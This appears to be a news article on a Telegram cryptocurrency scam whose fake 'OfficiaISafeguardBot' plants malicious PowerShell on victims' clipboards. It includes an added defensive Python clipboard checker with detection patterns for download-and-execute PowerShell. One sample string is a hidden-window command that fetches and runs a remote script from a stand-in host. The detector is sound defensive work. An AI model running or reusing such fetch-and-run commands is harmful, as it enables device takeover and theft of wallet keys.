A new and complex scam is targeting cryptocurrency users, exploiting fake Telegram groups and malicious verification bots to steal private information and cryptocurrency. This scam has been identified by cybersecurity experts as a dangerous blend of impersonation, social engineering, and malware deployment.
The fraud begins with scammers creating counterfeit social media accounts that closely resemble those of popular crypto influencers.
These accounts interact with legitimate posts, inviting users to join Telegram groups that promise insider tips or exclusive investment opportunities. Once inside the group, users are instructed to complete a verification process through a bot named “OfficiaISafeguardBot.”
The verification process, designed to appear legitimate, manipulates users into acting quickly by imposing a narrow time limit. However, instead of verifying identities, the bot injects malicious PowerShell code into the user’s clipboard.
If executed, this code downloads malware that can take control of the user’s device, compromise sensitive data, and steal private keys associated with cryptocurrency wallets.
Cybersecurity platform VirusTotal has flagged the malware as harmful, and reports have surfaced of victims losing access to their crypto holdings. This scam highlights the evolving methods fraudsters and bad actors in general use to exploit cryptocurrency users, moving beyond traditional phishing tactics to include advanced technological tools.
To avoid becoming a victim, the key is to remain cautious. Since Telegram groups are popular gathering spots, crypto users should be wary of joining or interacting with unverified groups or accounts that impersonate influencers.
Refrain from executing unfamiliar commands or installing untrusted software or apps, and consider using hardware wallets to securely store cryptocurrency.
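One way to act on this advice is to inspect clipboard text before it is pasted into a terminal or the Windows Run dialog. The following Python check is an added example, not code from the article or from any vendor; the indicator patterns, the function name `assess_clipboard` and the sample strings are assumptions constructed for illustration, since the article does not publish the actual payload.

```python
import re

# Heuristic indicators of a paste-and-run PowerShell command.
# Assumed for illustration; not derived from the sample the article describes.
INDICATORS = {
    "powershell_invocation": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "encoded_command": re.compile(r"(?<!\S)-e(?:nc\w*)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "download_cmdlet": re.compile(
        r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile)\b",
        re.I),
    "dynamic_execution": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def assess_clipboard(text):
    """Return (verdict, matched indicator names) for clipboard text.

    verdict is "block" for download-and-execute shapes, "review" for
    anything that merely looks like PowerShell, "allow" otherwise.
    """
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    # A bare URL on the clipboard is normal; only code-like hits matter.
    if not hits - {"remote_url"}:
        return "allow", sorted(hits)
    risky = bool(
        "encoded_command" in hits
        or {"download_cmdlet", "dynamic_execution"} <= hits
        or ("powershell_invocation" in hits
            and hits & {"hidden_window", "download_cmdlet"})
    )
    return ("block" if risky else "review"), sorted(hits)


if __name__ == "__main__":
    # Constructed samples; example.invalid is a reserved, non-resolving name.
    samples = [
        "Verification code: 482-193",
        "https://example.invalid/docs",
        "powershell Get-Date",
        'powershell -w hidden -c "iex (iwr https://example.invalid/verify.ps1)"',
    ]
    for s in samples:
        print(assess_clipboard(s), "<-", s)
```

A "block" verdict means the text should not be pasted at all; "review" means a person should read the command before running it.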
As the crypto space continues to attract innovative technologies, it also draws increasingly sophisticated scams. Sharing knowledge about these threats is key to protecting the growing number of users entering the digital currency market.
Earlier in the year, Binance reported malware that manipulates users' clipboards, replacing wallet addresses copied to them with a hacker's address, resulting in financial loss.